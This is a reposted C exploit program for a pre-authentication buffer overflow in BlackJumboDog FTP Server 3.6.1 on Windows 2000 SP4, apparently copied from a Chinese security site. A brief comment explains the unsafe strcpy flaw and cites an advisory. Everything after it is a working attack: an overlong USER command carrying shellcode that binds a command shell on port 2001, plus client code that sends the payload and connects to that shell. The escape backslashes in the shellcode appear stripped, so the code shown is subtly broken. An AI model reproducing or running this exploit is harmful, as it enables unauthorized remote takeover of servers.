信息来源:hk20.com
复制内容到剪贴板
代码:
//**************************************************************************
// BlackJumboDog FTP Server Buffer Overflow Vulnerability
// Bind Shell Exploit for English Win2K SP4
// 27 Jul 2004
//
// BlackJumboDog is an integrated proxy server, web server and FTP server
// developed by SapporoWorks for Microsoft Windows platforms. BlackJumboDog
// version 3.6.1 is vulnerable to a buffer overflow in its FTP server. By
// sending a FTP request containing an overly long parameter string in the
// USER, PASS, RETR, CWD, XMKD, XRMD or various other commands, a remote
// attacker can cause a stack overflow, overwriting EIP, and could execute
// arbitrary code.
//
// This vulnerability is caused by an unsafe strcpy that copies the entire
// parameter of the user's FTP command to a stack buffer of 256 bytes.
// For example, if the user's FTP client issues the following command,
//
// USER xxxxxxxxxxxx
//
// The FTP command parameter "xxxxxxxxxxxx" will be copied to a 256 bytes
// buffer using strcpy. Hence, by crafting an FTP command with an overly long
// parameter, a remote attacker can trigger a stack overflow and execute
// arbitrary code. The attacker do not need to have a valid account on the
// FTP server since the overflow can be triggered before authentication using
// the USER command.
//
// This exploit code binds shell on port 2001 of a vulnerable BlackJumboDog
// FTP server.
//
// Advisory
// [url]http://www.security.org.sg/vuln/bjd361.html[/url]
//
// Greetz: snooq, sk, and all guys at SIG^2 ([url]www.security.org.sg[/url])
//
//**************************************************************************
#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32.lib")
unsigned char expBuf[] =
"USER "
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV"
"WWWW"
"AAAABBBB"
"xEBx06x90x90"// call ebx lands here
"xD6x19x02x75"// this overwrites EIP (address of CALL EBX)
"x90x90x90x90"
"xEBx62x55x8BxECx51x56x57x8Bx5Dx08x8Bx73x3Cx8Bx74"
"x33x78x03xF3x8Bx7Ex20x03xFBx8Bx4Ex18x56x33xD2x8B"
"x37x03x75x08x33xDBx33xC0xACx85xC0x74x09xC1xCBx0C"
"xD1xCBx03xD8xEBxF0x3Bx5Dx0Cx74x0Bx83xC7x04x42xE2"
"xDEx5Ex33xC0xEBx17x5Ex8Bx7Ex24x03x7Dx08x66x8Bx04"
"x57x8Bx7Ex1Cx03x7Dx08x8Bx04x87x03x45x08x5Fx5Ex59"
"x8BxE5x5DxC3x55x8BxECx33xC9xB1xC8x2BxE1x32xC0x8B"
"xFCxF3xAAxB1x30x64x8Bx01x8Bx40x0Cx8Bx70x1CxADx8B"
"x58x08x89x5DxFCx68x8Ex4Ex0ExECxFFx75xFCxE8x70xFF"
"xFFxFFx83xC4x08xBBxAAxAAx6Cx6CxC1xEBx10x53x68x33"
"x32x2Ex64x68x77x73x32x5Fx54xFFxD0x89x45xF8xEBx35"
"x5Ex8Dx7DxF4x33xC9xB1x09xFFx36xFFx75xFCxE8x40xFF"
"xFFxFFx83xC4x08x85xC0x75x0Ex90xFFx36xFFx75xF8xE8"
"x2ExFFxFFxFFx83xC4x08x89x07x33xC0xB0x04x03xF0x2B"
"xF8xE2xD5xEBx29xE8xC6xFFxFFxFFx72xFExB3x16x35x54"
"x8AxA1xA4xADx2ExE9xA4x1Ax70xC7xD9x09xF5xADxCBxED"
"xFCx3BxEFxCExE0x60xE7x79xC6x79xADxD9x05xCEx54x6A"
"x02xFFx55xE0x33xC0x50x50x50x50x6Ax01x6Ax02xFFx55"
"xE4x89x45xD0x33xC0x50xB8xFDxFFxF8x2Ex83xF0xFFx50"
"x8BxC4x6Ax10x50xFFx75xD0xFFx55xE8x6Ax05xFFx75xD0"
"xFFx55xECx85xC0x75x68x8BxCCx6Ax10x8BxDCx33xC0x50"
"x50x53x51xFFx75xD0xFFx55xF0x8BxD0x5Bx83xF0xFFx74"
"x4Ex8BxFCx33xC9xB1x64x33xC0xF3xAAxC6x04x24x44x66"
"xC7x44x24x2Cx01x01x89x54x24x38x89x54x24x3Cx89x54"
"x24x40x8BxC4x8Dx58x44xB9xFFx63x6Dx64xC1xE9x08x51"
"x8BxCCx52x53x53x50x33xC0x50x50x50x6Ax01x50x50x51"
"x50xFFx55xF4x5Bx6AxFFxFFx33xFFx55xD4xFFx55xD8xFF"
"x75xD0xFFx55xD8x50xFFx55xDC"
"rn";
void shell(int sockfd)
{
char buffer[1024];
fd_set rset;
FD_ZERO(&rset);
for(;;)
{
if(kbhit() != 0)
{
fgets(buffer, sizeof(buffer) - 2, stdin);
send(sockfd, buffer, strlen(buffer), 0);
}
FD_ZERO(&rset);
FD_SET(sockfd, &rset);
timeval tv;
tv.tv_sec = 0;
tv.tv_usec = 50;
if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)
{
printf("select errorn");
break;
}
if(FD_ISSET(sockfd, &rset))
{
int n;
ZeroMemory(buffer, sizeof(buffer));
if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
{
printf("EOFn");
exit(0);
}
else
{
fwrite(buffer, 1, n, stdout);
}
}
}
}
int main(int argc, char* argv[])
{
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in sin;
int err;
char inBuffer[10000];
if(argc != 2)
{
printf("Usage: %s <ip addr>n", argv[0]);
return 1;
}
wVersionRequested = MAKEWORD(2,0);
err = WSAStartup(wVersionRequested, &wsaData);
if(err != 0)
{
printf("nWSAStartup Error.n");
return 1;
}
if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0)
{
printf("nWinsock Version Errorn");
WSACleanup();
return 1;
}
SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_family = AF_INET;
sin.sin_port = htons(21);
if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
{
int size;
// read FTP banner
size = recv(s, inBuffer, sizeof(inBuffer), 0);
if(size == SOCKET_ERROR)
{
printf("Error receiving FTP banner!n");
return 1;
}
fwrite(inBuffer, 1, size, stdout);
if(send(s, (char *)expBuf, strlen((char *)expBuf), 0) == SOCKET_ERROR)
{
printf("Error sending exploit!n");
return 1;
}
printf("Exploit Sent.n");
Sleep(2000);
//================================= Connect to the target ==============================
SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock == INVALID_SOCKET)
{
printf("Invalid socket return in socket() call.n");
WSACleanup();
return -1;
}
sin.sin_family = AF_INET;
sin.sin_port = htons(2001);
sin.sin_addr.s_addr = inet_addr(argv[1]);
if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
{
printf("Exploit Failed. SOCKET_ERROR return in connect call.n");
closesocket(sock);
WSACleanup();
return -1;
}
shell(sock);
}
else
{
printf("Cannot connect!n");
}
closesocket(s);
WSACleanup();
return 0;
}
